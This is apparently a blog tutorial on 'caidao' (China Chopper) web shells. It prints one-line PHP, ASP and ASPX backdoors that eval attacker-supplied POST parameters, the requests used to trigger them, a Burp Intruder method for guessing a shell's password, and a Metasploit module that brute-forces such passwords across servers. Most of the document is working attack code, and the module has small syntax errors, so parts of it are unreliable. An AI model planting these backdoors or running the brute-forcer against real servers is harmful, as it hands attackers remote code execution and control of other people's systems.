Metasploit - crack chinese caidao php backdoor

Backdoor Request

PHP Backdoor:     <?php @eval($_POST["OP"]);?> HTTP Request:     POST /bk.php     ....     op=phpinfo(); If it's successful, phpinfo page will show us.

ASP Backdoor:     <%eval request("op")%> HTTP Request:     POST /bk.asp     op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.    end") If it's successful, 'woo5woo' page will show us.

ASPX Backdoor:     <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%> HTTP Request:     POST /bk.aspx     op=Response.Write("woo");Response.Write(1+4);Response.Write("woo") If it's successful, 'woo5woo' page will show us.

Crack a php backdoor

For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Press  the lable called "Click Here", we will see HTTP request in burpsuite.

send it to intruder, and make "adminadmin" as a intruder variable.

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
      'Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
      'Author'         => [ 'Nixawk' ],
      'References'     => 
        [
              [ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  def backdoor_brute(uri, user, pass, payload, match)
    begin
      data = "&user=#{user}&#{pass}=#{payload}"
      res = send_request_cgi({
          'uri'          =>  uri,
          'method'       =>  "POST",
          'data'         =>  "#{data}"
      })

    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT
      print_error("#{peer} - Service failed to respond")
      return :abort

    end

    print_status("#{peer} - brute force caidao password: \"#{pass}\"")

    if res and res.code == 200 and res.body =~ /#{match}/mi
        print_good("#{peer} - Successful login: password - \"#{pass}\"")

        return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    junk = Rex::Text::rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";

    when /asp$/mi
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

    when /aspx$/mi
      payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"

    else
      print_error("#{peer} - Backddor type is not support")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end